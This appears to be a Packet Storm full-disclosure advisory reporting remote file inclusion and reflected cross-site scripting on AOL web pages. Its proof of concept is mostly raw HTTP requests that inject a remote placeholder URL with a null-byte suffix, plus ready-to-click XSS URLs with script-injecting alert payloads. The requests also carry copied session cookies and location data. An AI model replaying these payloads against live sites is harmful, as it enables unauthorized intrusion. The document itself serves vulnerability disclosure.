exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AOL File Inclusion / Cross Site Scripting

AOL File Inclusion / Cross Site Scripting
Posted Jan 22, 2014
Authored by Juan Carlos Garcia

America Online (AOL) suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, file inclusion
SHA-256 | 8a613994798545bcea472db93af4ceb0b66319269963bcb88f660250d728a92b

AOL File Inclusion / Cross Site Scripting

Change Mirror Download

AOL File Inclusion / Cross Site ScrIpting
*******************************


Time-Line vulnerability
------------------------

-Multiples Security Advisories

-Not Response

-Not FeedBack

-Not Fixed

-Another Security Advisory ( & another..)

-Not Response-Not FeedBack

-Full Disclosure


I. VULNERABILITY
-------------------------

#Title: AOL File Inclusion / Cross Site Scrpting

#Vendor:http://www.aol.com

#Author: Juan Carlos García (@secnight)
#Author: Francisco Moraga (@btshell)

www.asap-sec.com



II. DESCRIPTION
-------------------------

AOL Inc. (previously known as America Online, written as AOL and styled as "Aol." but commonly pronounced as an initialism) is an American multinational mass media corporation based in New York City that develops, grows, and invests in brands and web sites.
The company's business spans digital distribution of content, products, and services, which it offers to consumers,publishers, and advertisers.

Founded in 1983 as Control Video Corporation, an online services company by Jim Kimsey from the remnants of Control Video Corporation, AOL has franchised its services to companies in several nations around the world or to set up international versions of its services.AOL is headquartered at 770 Broadway in New York..


(Wikipedia)

III-Proof Of Concept
------------------


Remote File Inclusion
*******************


Vulnerability description
---------------------------


This script is vulnerable to file inclusion attacks.

It seems that this script includes a file which name is determined using user-supplied data.

This data is not properly validated before being passed to the include function.



Affected items
----------------

/ajax.jsp (5)


The impact of this vulnerability
--------------------------------
It is possible for a remote attacker to include a file from local or remote resources and/or
execute arbitrary script code with the privileges of the web-server.


How to fix this vulnerability
------------------------------
Edit the source code to ensure that input is properly validated. Where is possible, it is recommended to make a list of accepted filenames and restrict the input to that list.


Attack details
-----------------

URL encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response


HTTP/1.1 200 OK

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

Cache-Control: no-cache, no-store, private, max-age=0

Expires: 0

Content-Type: text/javascript;charset=UTF-8

Content-Length: 130

Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol

Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive




Variant 1
-----------

URL encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA

%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;

rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response

HTTP/1.1 200 OK

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

Cache-Control: no-cache, no-store, private, max-age=0

Expires: 0

Content-Type: text/javascript;charset=UTF-8

Content-Length: 130

Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol

Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive


Variant 3
---------

URL encoded GET input p was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie:

tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D



Variant 4
---------

Attack details
----------------
URL encoded GET input p was set to http://some-inexistent website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


GET /ajax.jsp?ajax=1&cv=6&dlItem=431789&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistentwebsite.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5

HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response
----------
HTTP/1.1 200 OK

Cache-Control: max-age=5
Connection: Keep-Alive

Via: AOL-CACHE

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

test-timestamp: 1390300006644

Content-Type: text/javascript;charset=UTF-8

Content-Length: 142

Keep-Alive: timeout=5, max=100



Cross Site Scripting
*********************


http://search.aol.com/aol/webhome?s_chn=%3C/script%3E%3Cscript%3Ealert%28%22Secnight%20and%20BTshell%22%29;%3C/script%3E%3Cscript%3E


http://search.aol.co.uk/aol/webhome?s_chn=%3C%2Fscript%3E%3Cscript%3Ealert%28%22Secnight+and+BTshell+says..+Security+Advisory%3A+Not+FeedBack+Not+Response+Not+Fixed..+Full+Disclosure+asap-sec.com%22%29%3B%3C%2Fscript%3E%3Cscript%3E …


IV-Authors:
-----------
Juan Carlos García @secnight
Francisco Moraga @BTshell
ASAP Security As Soon As Possible

www-asap-sec.com

LEGAL NOTICES
--------------

The Authors accepts no responsibility for any damage caused by the use or misuse of this information.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close